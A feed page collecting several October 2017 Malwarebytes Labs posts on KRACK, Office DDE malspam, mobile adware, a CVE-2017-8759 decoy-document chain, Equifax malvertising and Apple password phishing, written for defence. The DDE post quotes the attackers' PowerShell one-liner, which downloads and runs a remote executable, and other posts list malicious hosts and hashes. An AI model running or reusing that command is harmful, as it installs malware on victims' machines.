Techie Feeds

Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable

Malwarebytes - Tue, 10/17/2017 - 16:44

A serious flaw in the wireless protocol that secures all modern protected Wi-Fi networks has been discovered.

How serious? If your device supports Wi-Fi, it is most likely affected. This feasible attack, dubbed KRACK, could abuse design or implementation flaws in the Wi-Fi standard, not some specific hardware. The KRACK attack, short for Key Reinstallation Attack, would allow a malicious actor within Wi-Fi range to insert himself into the network and intercept traffic between the device and the router.

This means everyone using WPA2 (the protocol known as Wireless Protection Access 2) could be impacted to some degree.

How impacted depends on multiple factors, but it ranges from traffic interception and decryption of encrypted data to injection of malicious traffic.

Android and Linux are especially vulnerable to this attack, as they can be tricked into re-installing an all-zero encryption key allowing full visibility into the traffic.

The good
  • Attacks can be somewhat mitigated if the traffic is HTTPS.
  • Apple has already patched iOS, macOS, tvOS, and watchOS. Great if your device is current; not so great if it isn’t.
  • Maybe this will finally get outdated routers retired and current ones patched?
  • Attacks are stymied by VPN usage.
  • If you have automatic updates on Windows, a patch has already been pushed, with a caveat. Microsoft still recommends contacting your hardware vendor to see if updated drivers for your wireless adapter are available.
  • Mathy Vanhoef did responsible disclosure and withheld public disclosure until major players could create patches.
The bad
  • Android users, with their fractured landscape and poor patching availability, are at risk, some with no possible solution.
  • Some routers will never receive an updated firmware making them vulnerable forever. Updating the firmware on a router is beyond what the average user feels comfortable doing.
  • While HTTPS can mitigate some attacks, improper implementations on websites are common, and once your traffic is routing through a maliciously controlled “man-in-the-middle” router, you’re vulnerable to other traffic manipulation.
  • Expect KRACK to go from POC to practical deployment at the coffee shop very quickly. Remember Firesheep? WEP wardriving? Someone is bound to make an app that will dramatically lower the difficulty to exploit this.
  • This won’t be fixed fully until the Wi-Fi standard is changed.
What to do about it
  • Run updates on all your devices, systems, and software. If you don’t have automatic updates on your windows machine, look out for the Microsoft patch, which they issued on October 10.
  • Android users: Keep your eyes peeled for updates from Google, which they said would be available in the coming weeks.
  • If you’ve got Apple products, update them to the latest versions, which will protect against a KRACK attack. Older versions will be vulnerable.
  • See if your router manufacturers have issued updated firmware that addresses this vulnerability and update as soon as possible. If not, you might consider replacing the router.
  • It is important to keep in mind that it’s not only individuals who are impacted by this vulnerability, but also businesses. Any Wi-Fi deployment that uses WPA2 can be exploited. This means organizations should also push updates and be sure remote workers are securing their devices and systems as well.

The post Release the KRACKen: flaw in Wi-Fi security leaves users vulnerable appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Old MS Office feature weaponized in malspam attacks

Malwarebytes - Tue, 10/17/2017 - 15:00

There has been a lot of talks recently following a write up and proof of concept about a Microsoft Office feature that can be misused and weaponized by malicious actors. The protocol, known as Dynamic Data Exchange (DDE), has actually been around for a long time, and allows applications to exchange data and send updates to each other. This feature can be used, for example, to refresh a cell in Excel with data coming from another program.

Now threat actors are using this feature to distribute malware without relying on macros or exploits.

Perhaps what makes this technique most interesting is the fact that malicious actors can craft booby trapped documents void of any macro and still achieve code execution. Macros have been a favourite among spammers but they are highly suspicious, and many system administrators have set up group policies to disable them completely. This is why cybercriminals seek out any other way to deliver malware via Office files.

In the case of the DDE method, no exploits are used. Instead, a social engineering technique is employed to entice users into clicking a prompt.

First, the DDE was used in some targeted attacks. However, now it has become mainstream with the group behind Hancitor (spotted by @James_inthe_box and DDE identified by @mesa_matt), who leveraged it in their latest spam campaign.

We can find where the malicious code is inserted by checking for any reference to DDE within the document’s code. Didier Stevens published a Yara rule for this very purpose, but it seems the miscreants evaded detection by splitting the string of interest:

The final code put together looks like this:

"DdE" c:\\Windows\\System32\\cmd.exe " /k powershell.exe (New-Object System.Net. WebClient).DownloadFile('http://frontiertherapycenter[.]com/16.exe', '%TEMP%\\tvs.exe');Start-Process '%TEMP%\\tvs.exe'"</w:instrText>

The rest of the attack is straight forward, with PowerShell downloading and running the malicious binary (Hancitor) from the %temp% folder.

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability, and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes and consider the validity of retaining it.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document

f945105f5a0bc8ea0d62a28ee62883ffc14377b6abec2d0841e88935fd8902d3

Hancitor

8f94cee61a76c7b9612381978876dcd996c15ae8da50fd75d700a05df571d10a

The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Yet more mobile adware found in Google Play

Malwarebytes - Tue, 10/17/2017 - 07:25

Finding an adware variant that made its way past the Google Play store is out of the ordinary. So when two adware variants slip by in one week, we take notice. Last week, we added two new Ad SDKs to our growing list of adware detections—Adware.Solid and Adware.Cootek. Both Ad SDKs were found in an abundance of apps in Google Play. Adware.Cootek infects over 2,000 Play store apps alone, according to our Mobile Intelligence System.

Behaving badly

Both pieces of adware have remarkably similar traits, displaying full screen ads inside and outside of the infected running app. In addition, they both show ads during screen lock and immediately after unlocking the screen. For your viewing pleasure, below you can find an array of offending ads with captions detailing the inappropriate timing:

Click to view slideshow. We’re listening

Ads displayed inside a free app? Fair game. Ads displayed outside the app, especially during and immediately after screen lock? That, my dear readers, is where we draw the line. Many of these apps contain reviews on Google Play addressing the aggressive nature of the ads contained. Unfortunately, these reviews fall on the deaf ears of the app developers. But fear not my friends, for we are listening. Whether it’s in Google Play or not, we take a hard stance on aggressive adware. Cue shameless (yet helpful) plug: Malwarebytes for Android warns you when Ads are crossing the line.

Use common sense

A note to app developers. We get that you need to make some revenue from your hard work, and selecting an appropriate Ad SDK to tack onto your apps is tough business. Perhaps it’s unfair to take the blame when at the time the Ad SDK was selected, it wasn’t considered adware. However, I ask this question: How many bad reviews does it take before you repackage with another, less offensive, Ad SDK? One app we found which will remain nameless had around 400 one star reviews, and I’m willing to bet most were addressing the aggressive ads. Think about how you’d like to interact with an app: would all of those aggressive ads make you enjoy the app even more, or would they frustrate you? Use common sense when selecting an Ad SDK.

It’s up to the user

As already addressed in our Mobile Menace Monday post, we know that mobile adware is not dangerous malware—more like an inconvenience. In some cases, it goes behind annoyance when it is collects too much personal information. This can include GPS location, phone number, IMEI, and IMSI. Still, this isn’t a blatant act of maliciousness as seen from far more threatening pieces of malware.

It’s fully up to you, the user, whether to delete the offending app or ignore our warnings. If you choose to ignore and accept the presence of these annoying ads and/or the potential to collect personal information, no further harm should come your way. Admittedly, we can’t fully guarantee this claim—thus, I leave you with this: Ignore at your own risk.

Unfortunately, we called it

When Google Play Protect was released, I conveyed my concern for adware along with other Potentially Unwanted Programs (PUPs) still making their way into the Play market. Unsurprisingly, here we are with two new pieces of adware found in one week. My prediction is that this is only the beginning. Stay safe out there!

The post Yet more mobile adware found in Google Play appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 9 – October 15)

Malwarebytes - Mon, 10/16/2017 - 19:00

Last week on the Labs blog, we talked about GDPR as part of our series in the National Cyber Security Awareness Month (NCSAM). We also discussed a new method for phishing Apple ID passwords and the possible ramifications. We analyzed the malvertising chain due to a script that was found on popular websites like those of Equifax (!) and TransUnion. And we explained how decoy Word documents are used to deliver malware using the hyperlink feature in the OpenXML format.

Malwarebytes news

It was a great week for Malwarebytes since we won three awards at the 2017 Computing Security Awards: Security Company of the Year, Editors Choice, and Malware Solution of the Year. And we were chosen as the winner in the “Rising Star: Cybersecurity Solution” category of NetworkWorld Asia 2017 Readers’ Choice Awards.

Our CEO, Marcin Kleczynski, was interviewed by the Huffington Post on the subject 5 things I wish someone told me before I became CEO. And the Malwarebytes Labs team presented you with the quarterly Cybercrime Tactics and Techniques looking back at an unprecedented season of breaches.

Other security news Business

Akamai presented their findings on a large-scale Fast Flux botnet at their annual customer conference. The botnet using Fast Flux techniques has over 14,000 IP addresses associated with it. Some of the associated IP addresses are in address spaces that are assigned to Fortune 100 companies. These addresses are most likely used by the Fast Flux network owner as spoofed entities and are not genuine members of the network. This allows the botnet to inherit the reputation of the Fortune 100 companies.

Pen Test Partners, a UK cybersecurity company, found appalling security lapses while investigating naval ships that had equipment exposed online. Ships nowadays are complex industrial machines: traditionally isolated, now always-on, connected through VSAT, GSM/LTE, and even Wi-Fi. Crew Internet access, mashed up with electronic navigation systems, ECDIS, propulsion, load management, and numerous other complex, custom systems is a recipe for disaster if not properly secured.

The Register discussed whether the law that would allow hacking victims to seek revenge and hack the hackers who hacked them is a good idea or not. The Active Cyber Defense Certainty Act amends the Computer Fraud and Abuse Act to make limited retaliatory strikes against cyber miscreants legal in America for the first time. The bill would allow hacked organizations to venture outside their networks to identify an intruder and infiltrate their systems, destroy any data that had been stolen, and deploy “beaconing technology” to trace the physical location of the attacker.

A series of distributed denial of service (DDoS) attacks aimed at Sweden’s transportation services caused train delays and disrupted over travel service. The DDoS bombardment reportedly crashed the IT system that monitors trains’ locations and tells operators when to go or stop. It also took down the federal agency’s email system, website, and road traffic maps.

Consumer

Politifact was named as yet another site using cryptominers to have visitors pay for their visit to the site. We described the growing number of sites using drive-by mining some time ago.

Android users downloading a fake Adobe Flash Player from a malicious website may find themselves victimized by a unique strain of Android ransomware called DoubleLocker. “The most interesting thing here is that it uses a dangerous combination of three aspects we have not seen before: accessibility services, which perform a click on the user’s behalf; it encrypts data; and it can reset a PIN for a user’s device.”

Stay safe everyone!

The post A week in security (October 9 – October 15) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Phishes, pseudophishes, and bad email

Malwarebytes - Mon, 10/16/2017 - 18:00

Everyone knows about phishing. We’ve all heard that the solution to phishing is to educate the user as, after all, it must be the user’s fault for stupidly clicking on the thing. But what about when perverse incentives make clicking the phish seem logical? What about the enterprise pseudophish—when design-by-committee language, lack of attribution, and over broad requests for personal information make something look like a phish?

Users will frequently be inundated with corporate requests for information; requests they are often required to comply with. When companies that don’t think these things through end up with something that apes the style of a phish, they can be training their users to click on actual phishes that come their way. Let’s check out a recent example pertinent to the Anthem breach settlement a few months back.

This legitimate email relies fairly heavily on the style and tone favored by phishes for decades. First of all, the email includes a lengthy “Claim ID” string without explaining what that means to the user. Next is the all-caps appeal to authority of a “court-approved legal notice.” The sender then includes an urgent call to action bounded with a deadline to induce anxiety. Lastly, they provide links with no indication of content and no direct connection to Anthem that the user is expected to click on.

Stylistically, the whole thing is a mess of odd margins and shifting formatting for no particular reason.  Most concerning is that nowhere in the email does it address who the sender is, how they got your email, or what their connection to Anthem is.

Are there other ways to verify the legitimacy of the email, like examining headers, running the URL provided in a test VM first, or searching on the provided number? Of course. But can we realistically expect the user to do that for every ill-thought out communication?

User education

The presumption of many security professionals is that clicking a malicious link is a lapse in judgment or temporary insanity on the part of the user. But given the above legitimate message that the user is required to read and act upon, is it unreasonable that they would click on a Dridex malspam using the same pitch? Would we as network defenders be shocked to see a phish that looked like this? And finally, given the absurdly high volume of email most end users deal with in an office environment, aren’t we really educating them to go ahead and click?

Please don’t do this

How do you stop phishing your own users? Before you hit send, make sure of the following:

  • Use consistent text formatting, spacing, and justification.
  • Don’t use third-party assets unless you know the user can display them in the same way you can.
  • Identify yourself, and provide a backchannel to verify who you are outside of the email. Faceless entities engaged in unsolicited contact to spur the user with an urgent call to action is a textbook phishing pitch.
  • Provide the full URL to links you want clicked. One of the most basic tricks in a phish is to hide or obfuscate an URL to discourage vetting by the user.

Malspam mitigation comes with many technical fixes: disabling office Macros, blocking unnecessary outbound traffic on a given user group’s profile, or blocking local execution of scripts, to name a few. But if the ultimate fix for phishing and malspam is the user who simply deletes the offending message, a simpler (and cheaper) fix is to stop flooding them with pseudophishes. Some additional time and forethought on user experience can create incentives leading to better security outcomes for everyone.  When we send a clear, consistent message on security, we all stay safer.

The post Phishes, pseudophishes, and bad email appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Mobile Menace Monday: despicable adware

Malwarebytes - Mon, 10/16/2017 - 17:00

Are you wondering how that mysterious icon ended up on your Android phone’s start screen? Annoyed at the ads clogging your notification bar? You aren’t alone. Thousands of Android apps now include software that shoves marketing icons onto your phone’s start screen or pushes advertising into your notification bar. These apps give you no warning about the adware invasion.

Even though many of these ads come from different mobile marketing companies, all have the same goal—to make money. Working with app developers hungry for some way to make money themselves, these marketing companies will do anything to make a buck. So they’ll bundle popular apps with adware and bombard millions of users with advertising each week.

Introduction to adware

So what, exactly, does adware do? Adware such as Startapp is a subcategory of Potentially Unwanted Programs (PUPs), which are apps or other types of software that you likely didn’t want installed on your computer, either because they hid their true nature or because they came bundled with other wanted programs. So if you download a popular app that comes bundled with adware, you may be in for a less-than-pleasant experience.

Once adware hijacks your device, it might carry out all sorts of unwanted tasks. For example, it could display questionable advertising content as icons, notification messages in the device interface, or pop-up messages. It might also change your browser front page or default search engine. It doesn’t matter whether you are using Chrome, Firefox, or other browsers: It affects all of them.

Let’s take as an example an app called Qr Code And Barcode Reader, which was once available on the Google Play market, but has now been removed. Qr Code marketed itself as a simple barcode reader, but hiding in plain sight was adware.

As discussed in our blog Mobile Menace Monday: Implications of Google Play Protect, Google Play is not impenetrable. In fact, during the time of this writing, two new types of Adware were found in Google Play; Adware.Solid and Adware.Cootek. This is probably why the Qr Code app was available on the market in the first place. So let’s pretend we found this app in Google Play and decided to install it.

First evidence

When you first install Qr Code, it will ask you for device admin permissions without any note of why it needs these rights. If you’re a discerning user, this first piece of evidence may lead you to certain conclusions about the legality of the application itself. However, most people would probably take a quick glance and hit “activate” in order to get the app they were looking for.

Once you select “activate,” you give the app full access to the phone. This is when the app launches its evil plan to load and show ads directly on the home screen. We can explicitly observe this from logcat, a tool used to view real-time system messages on an Android device.

 Logcat evidence  09-03 07:55:29.961 589-701/system_process I/ActivityManager: START u0 {flg=0x14000000 cmp=com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity} from uid 10064 on display 0 09-03 07:55:29.972 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 W/GooglePlayServicesUtil: Google Play Store is missing. 09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Starting ad request. 09-03 07:55:29.973 1445-1445/com.studiobit.qr.code.and.reader.v2.v2 I/Ads: Use AdRequest.Builder.addTestDevice(“7C6CCED8FF697C98BEAA38D05BG347D4”) to get test ads on this device. 09-03 07:55:30.500 589-610/system_process I/ActivityManager: Displayed com.studiobit.qr.code.and.reader.v2.v2/com.studiobit.qr.code.and.reader.v2.AdvertisementActivity: +532ms Scalpel, clamp

If you want to find the smoking gun, a technically savvy person would check the manifest file, where you can see that permissions and activities, services, and receivers are in the list associated with Adware.Startapp—thus without any doubt we can say that this Qr Code app has adware components inside.

Activity:
android:name="com.startapp.android.publish.ads.list3d.List3DActivity"
android:name="com.startapp.android.publish.adsCommon.activities.OverlayActivity"
android:name="com.startapp.android.publish.adsCommon.activities.FullScreenActivity" Service:
android:name="com.startapp.android.publish.common.metaData.PeriodicMetaDataService"
android:name="com.startapp.android.publish.common.metaData.InfoEventService" Receiver:
android:name="com.startapp.android.publish.common.metaData.BootCompleteListener" Methodology

Now we know Qr Code is certainly delivering adware. But in which way? There are many methods of displaying ads, including banners, splash ads, and exit ads. Qr Code uses Interstitial Callback methods.

Interstitial ads are full-screen ads that cover the interface of their host app. They typically appear between natural transition points in the flow of an app, such as between activities or during the pause between levels in a game. When an app shows an interstitial ad, the user has the choice to either tap on the ad and continue to its destination or close it and return to the app.

  • Callback method when Interstitial Ad is loaded:
startAppAds.loadAd(new AdEventListener()
  • Callback method when Interstitial Ad is shown:
startAppAds.showAd(new AdDisplayListener()

 

This type of ad is disruptive, sometimes difficult to close, and often results in a frustrating user experience.

But what you need to keep in mind when faced with adware is that, despite being incredibly bothersome, it is generally not malicious. There’s a significant difference between adware and dangerous malware such as Trojans or ransomware. Therefore, there’s no need to worry or panic: your device is not under imminent threat.

In fact, many mobile applications that are free of charge often include third-party advertising content. This is done as an alternative form of revenue for the software developers, as a result of not charging users for the application itself. Sometimes using these apps outweighs the inconvenience of having adverts displayed. It’s up to you to decide what you’ll put up with in exchange for keeping the application installed.

However, in our opinion, adware does more harm than good, and you shouldn’t have to put up with overbearing pop-ups in order to enjoy an app. (Malwarebytes for Android will detect adware and remove it if you choose.) So next time you download an app, take a hard look at what it includes. If adware is present, you might do better to choose another one!

The post Mobile Menace Monday: despicable adware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Decoy Microsoft Word document delivers malware through a RAT

Malwarebytes - Fri, 10/13/2017 - 15:00

In this post, we take a look at a Microsoft Word document which itself is somewhat clean, but is used to launch a multi-stage attack that relies on the hyperlink feature in the OpenXML format. This then loads another document that contains an exploit.

Most malicious Microsoft Office documents involve either macros, embedded scripts, or exploits and are typically delivered via email. In this case, the unsuspecting user opening the decoy Word document will trigger an automatic (no click or interaction required) download of a malicious RTF file that deploys an exploit (CVE-2017-8759), which ends up distributing the final malware payload.

The several-step removed payload is a commercial Remote Administration Tool that, in this case, is used for nefarious purposes. Victims will be none-the-wiser as the infection process happens in the background, while their Word document finally loads what looks like legitimate content.

While attackers could have sent the exploit-laced document first, that might have triggered detection and quarantine at the email gateway. Instead, the benign document acted as a kind of Trojan horse that made its way to the end user’s desktop, where it would finally show its real intent.

The diagram below summarizes the different steps that this attack takes, from the original document all the way to the malware payload.

Initial package

The initial document was reported by @xme on Twitter. A quick check using oletools indicates that the file has the OpenXML format and no macros.

FILE: Product Description.docx Type: OpenXML No VBA macros found.

Since OpenXML files are archives, they can be decompressed to reveal their content.

[CONTENT_TYPES].XML _RELS/.RELS WORD/_RELS/DOCUMENT.XML.RELS WORD/DOCUMENT.XML WORD/MEDIA/IMAGE1.EMF WORD/THEME/THEME1.XML WORD/SETTINGS.XML WORD/WEBSETTINGS.XML WORD/STYLESWITHEFFECTS.XML DOCPROPS/CORE.XML WORD/STYLES.XML WORD/FONTTABLE.XML DOCPROPS/APP.XML

Opening document.xml.rels reveals an interesting external URL, pointing to another document.

The relationship with Id=”rID6″ is loaded by the main document.xml file. If we open the document without network connectivity (to prevent the automatic execution), we can spot where this object is located.

The actual exploit: CVE-2017-8759

The remote file saqlyf.doc is downloaded and opened by Product Description.docx into the Temporary Internet Files folder.

This time, it is an RTF file.

After we convert the hexadecimal encoding to binary (oledump), we can spot another interesting URL.

At this point, we could be looking at CVE-2017-0199 if the server provided a MIME type response of application/hta. But in this case, we have something different, and we can quickly spot the SOAP-related bug associated with CVE-2017-8759.

The above code will parse and execute the content of the oghujp.hta file pictured below.

The nasty bit is encoded with ChrW but we can let VBScript do the work and output what it is in human, readable terms.

This is the final part of the exploitation phase, and it involves running PowerShell to download and run a binary.

Attack payload: a RAT

This attack was meant to install a commercial Remote Administration Tool known as Orcus Rat, which as seen previously was also hosted on the same server containing the exploit. The program is written in .NET and contains functions such as keylogging, remote desktop, or access to the webcam.

The file is concealed as mozilla.exe and periodically checks with its command and control infrastructure.

While commercial RATs can be used for legitimate purposes, malicious actors often abuse them for their own sinister goals.

Diversion

Part of the malicious VBScript creates a fake document on the fly that is displayed to the user. If you look carefully, you will notice that the file is called Document1, therefore it’s an additional file to the original Product Description.docx one. It also contains too many typos (but that’s a debate for another day).

Attack infrastructure

The exploit and payload used in this attack are served from a free file hosting site at pomf[.]cat.

A cursory look at the site revealed that many other malicious files are also hosted on this platform. We have reached out and requested a takedown of the offending files.

Protection

This type of attack relies on a little bit of social engineering to trick the user into opening a Word document, while the rest is handled by an exploit that was patched just a month ago. It’s quite likely many machines out there are still vulnerable if those updates have not been applied in a timely fashion.

Scanning for the original document at the gateway may not have returned anything due to its relatively benign nature, and this is why protection at the end point is so important. More and more attacks these days are modular and retrieve payloads on the fly in order to evade detection.

Malwarebytes users are already protected against this exploit. Additionally, we detect the RAT as Backdoor.NanoCore.

 

Indicators of compromise

Initial document (Product Description.docx)

01e45e5647f103ccc99311066d0625f24e79ec8462b131d026b7a557a18d7616

RTF (CVE-2017-8759)

a.pomf.cat/saqlyf.doc 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c

PNG (CVE-2017-8759)

a.pomf.cat/uczmbn.png 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60

HTA (CVE-2017-8759)

a.pomf.cat/oghujp.hta b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf

Payload (RAT)

a.pomf.cat/aqzhnk.exe 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2

The post Decoy Microsoft Word document delivers malware through a RAT appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax, TransUnion websites push fake Flash Player in malvertising campaign

Malwarebytes - Thu, 10/12/2017 - 21:42

Dan Goodin reported on Ars Technica that the Equifax website was involved in yet another kerfuffle, this time pushing a fake Flash Player. Looking at the YouTube video of this incident frame by frame, we were able to retrace some of this malvertising chain.

aa.econsumer.equifax.com (Equifax) -> ostats.net -> webhostingshub.com -> usa.quebec-lea.com -> usa.zeroredirect6.com -> cdn.centerbluray.info (fake Flash)

For those tracking malvertising, this is a very familiar sequence. However, a question remained as to how we got to the ostats[.]net URL. Dan Goodin shared a link about a possible culprit, namely a third-party library which would have been loaded from:

https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js

Since Equifax pulled that site down, it was not possible to identify what that script exactly did. However, a quick search for other websites that were using it returned—surprisingly—another consumer reporting credit agency, namely TransUnion and their Central America website.

By visiting transunioncentroamerica[.]com, we were able to confirm that this fireclick.js script was indeed part of this redirection chain.

This chain ultimately leads to the fake Flash player.

ostats[.]net domain is performing all sorts of redirections, as seen in this RiskIQ’s PassiveTotal search.

During our tests we encountered fake surveys, Flash updates, and also a redirection to the RIG exploit kit.

Third-party script

Fireclick is a legitimate analytics company. If we look at the script closer, we can see that it loads a URL from the Akamai CDN.

In turn, this loads content from another domain snap.sitestats[.]info.

This eventually leads to ostats[.]net.

Some other websites have the script embedded directly into their main page, and they also are involved in this malvertising campaign.

We are still investigating the incident and will report any updates we find on this blog. In the meantime, Malwarebytes users are protected against malicious redirections from this attack.

Indicators of compromise 10/12/2017 11:58:32 AM,GET,66.61.173.64,a248.e.akamai[.]net,CDN 10/12/2017 11:58:33 AM,POST,209.126.124.246,snap.sitestats[.]info,Stats site 10/12/2017 11:58:34 AM,GET,209.126.124.246,snap.sitestats[.]info,Stats site 10/12/2017 11:58:35 AM,GET,209.126.122.22,ostats[.]net,Redirector 10/12/2017 11:58:35 AM,GET,209.126.127.34,itechnews[.]org,Malvertising 10/12/2017 11:58:36 AM,GET,54.172.97.98,usd.quebec-lea[.]com,Malvertising 10/12/2017 11:58:36 AM,GET,54.172.97.98,usd.zeroredirect6[.]com,Malvertising 10/12/2017 11:58:37 AM,GET,34.194.20.115,www.temocycle[.]site,Malvertising 10/12/2017 11:58:37 AM,GET,35.163.98.253,www.theapplicationappmy23[.]download,Fake Flash site 10/12/2017 11:58:38 AM,GET,54.230.84.39,www.bestapps4ever161[.]download,Fake Flash site

Fake Flash player

24dba15691e81192b76327046f34b2a51b0b460ab058dbb411cf02407ebae57f

The post Equifax, TransUnion websites push fake Flash Player in malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report: summer ushers in unprecedented season of breaches

Malwarebytes - Thu, 10/12/2017 - 16:00

In this edition of the Malwarebytes Cybercrime Tactics and Techniques report for the third quarter of 2017, we saw a number of high profile breaches targeting the personal information of hundreds of millions of people. While the Equifax breach may have dominated the news cycle, notable attacks against the UK National Health Service (NHS), Instagram, Whole Foods, and Sonic were also reported. In addition, we’ve observed shifts in malware distribution, the revival of some old families, and found cases of international tech support scams.

For the full report, click here. For a summary of the report, check out the video and read on below!

Windows malware

Over the last quarter, we have observed several active spam campaigns pushing the Emotet banking Trojan on Windows systems. This malware makes money by intercepting network traffic and stealing bank account details, then selling them on the black market. In addition, Emotet has also been observed utilizing sophisticated evasion techniques to help hide from security software and spread the infection.

Mac malware

In Mac malware news, we have seen continuous growth and several long-term attackers coming back from the dead; families discovered years ago, made a comeback this quarter with new variants.

What this means is that Macs are beginning to attract more persistent adversaries who see the value in infecting Mac users. Apple still has a minority market share in the personal computer world, but they have become increasingly popular and their product’s mythical immunity to malware has been revealed to be just that, a myth.

Android malware

This quarter in Android malware, users have been targeted by a new ‘clicker’ Trojan we call Trojan.Clicker.HYJ. This malware has the capability to spread to other devices by utilizing the victim’s contact list.

Potentially unwanted programs

The adware industry has gone to great lengths to avoid detection by security products, which leaves your system wide open to infection by malware. The adware SmartScreen comes bundled with other PUP software, and its overall goal is to push advertising to any user who installs it. It also hooks into the operations of Windows, blocking security software from running. In the report, we take a deeper look at this pseudo-malware and what it can do.

Tech support scams

Multi-language tech support scams are on the rise globally, driven by geo-targeted malvertising campaigns. We expect an increase in the next quarter.

Webcasts

Put these on your calendars:

On October 25 at 11:00 am (PST) we’re hosting a webinar taking a deeper look at this quarter’s Cybercrime Tactics and Techniques report. Register here.

We’ll be doing a live webcast on November 2 @ noon (PST) on Facebook and YouTube. The event is going to feature Thomas Reed, our Director of Mac Offerings, and we are going to talk about historical Mac malware as well as what you are likely to encounter today, and how to stay safe from it.

Download full report here

We hope you enjoy the latest Cybercrime Tactics and Techniques report. We’d love to hear your feedback. What do you think about developments in cybersecurity this last quarter? What would you like to learn about next quarter? Thanks for reading and safe surfing!

The post Labs report: summer ushers in unprecedented season of breaches appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A new kind of Apple phishing scam

Malwarebytes - Wed, 10/11/2017 - 17:15

In a recent blog post, Felix Krause revealed a method for phishing Apple ID passwords on iOS that would be quite indistinguishable from a real iOS password request. This got us thinking about the ramifications—how else could this tactic be used in the Apple ecosystem, and what kind of damage could it do?

Image courtesy of krausefx.com

In the case of Krause’s iOS phishing scam, by using simple code any app could easily simulate a standard iOS password request, and most users wouldn’t think anything was amiss. Looking at Krause’s example above, I have to admit that this is something I might fall victim to, although I might wonder why the request was showing up within the context of a third-party app.

However, I don’t see this particular phish as a huge risk. iOS apps can only be downloaded through the App Store, and although I would never say that it’s impossible to get a phishing app into the App Store, it certainly would not be an easy thing to do. Not only would the hacker have to sneak this code past the review, they’d also have to create a decoy app that would be compelling enough to download—something that is increasingly difficult even for legitimate developers in the crowded iOS App Store. I view this as possible, but unlikely.

Of course, there are many other cases where the App Store screening process wouldn’t come into play, and that could be equally convincing, if not more so.

For example, consider macOS instead of iOS. Unlike on iOS, Mac users can download apps from anywhere, and frequently do. That’s how Mac users end up infected with things like malware, adware, and unethical junk software. Thus, there’s no review process a hacker would have to submit to.

Suppose you’re using your Mac, and suddenly the Mail app opens and shows a password request because of a failure with your iCloud account. It might look something like the image below. What would you do?

Would you enter your iCloud account password there? After all, it will reliably cite a correct iCloud account address. If you did enter your password in this case, sorry to tell you, you’d be pwned.

Okay, maybe that’s not the most convincing password request if you’re a Mac expert and know what these things are supposed to look like. (I can hear the criticisms now.) However, there are a couple important things to keep in mind.

First, this would trick a LOT of people. Sure, maybe not Mac aficionados, but most people are not, and shouldn’t have to be, experts in what every single macOS dialog looks like.

Second, this was the result of a four-line AppleScript I threw together in all of five minutes, with three of those lines involved in getting the email address associated with the user’s iCloud account. It would be entirely possible to make this far more convincing. Even just using AppleScript, it would be possible to use different techniques, and at least one that I can think of, for which I’ve seen a proof-of-concept, would be highly convincing.

Worse, it would be easy to mimic a real macOS authentication dialog, pixel-for-pixel, without too much effort in an app compiled in Xcode.

In fact, a similar event happened earlier this year, when Handbrake was hacked to install the Proton malware. The malicious copy of Handbrake ended up requesting the login password in such a way that even experts fell for it, such as a developer for the well-respected Panic, Inc.

We have become accustomed to such password requests as a part of our daily life, so when we see them, we tend to just enter the password without thinking about it. After all, Macs don’t get malware, right? Fortunately for Mac users, the actual incidences of this kind of harmful malware have been few, but that works in the hackers’ favor, since we’ve become inured to these requests and don’t treat them with the suspicion that they deserve.

So, what can be done about this kind of thing? Unfortunately, there is no one thing that Apple could do to solve this problem. An app will always be able to display a pixel-perfect simulation of any official macOS or iOS password request.

Worse, even a web developer could do the same, by combining screenshots from the target system and a web form. The code could detect the system and display an appropriate “window” for macOS, iOS, Windows, or Android. Slip something like that in as an overlay on top of a hacked legitimate site and you could fool a lot of folks.

Although Apple could direct the user at all times to a known, good location to enter passwords, that’s not always reasonable. Consider, for example, the horrible user experience Apple has foisted on Mac users with the new User-Approved Kernel Extension Loading process in macOS High Sierra. Although this is not the same as a password request, it’s a good example of how forcing the user to a location for security reasons could go horribly wrong, resulting in a bad user experience that may not actually be significantly more secure.

Instead of seeking fixes for something that can’t be fixed, we need to focus on changing our own behaviors. Every password request should always be viewed with suspicion, no matter the source. If Mail pops open and a window appears asking for a password, that doesn’t mean it’s actually Mail doing the asking.

Treating these password requests with suspicion means, in some cases, canceling and entering the password in a known, good location. For example, if an iCloud password is being requested, you should manually go to the iCloud pane in System Preferences to enter it.

Unfortunately, this is not always possible, as in the case of an installer asking for a password or an app asking for a password to install a helper tool. In the case of Handbrake, it is not normal for Handbrake to ask for a password, so seeing a password request in that context is a red flag. Although I must admit that I might have fallen for the fake Handbrake password request, if I were being more careful, I would check the developer’s website or product documentation to see if that is normal for Handbrake.

If the request comes up while you’re using your web browser, try moving the current web browser window around on the screen. If the “window” moves along with it, it’s not actually a window. It’s an element overlaid on top of the web page meant to look like a window, and that will mean it’s a fake.

It would also be possible to test these password requests by knowingly entering an incorrect password. Phishing malware or websites can’t know what your password is until you enter it, so they can’t know you entered the wrong password intentionally, and will simply accept what you typed. If, on the other hand, the bad password is rejected, it’s likely that the password request is legitimate.

With a little caution and attention paid to the context of password requests, you can avoid most, or even all, phishing attempts. The important thing is to be consistent, and not to get sloppy because you’re in a rush.

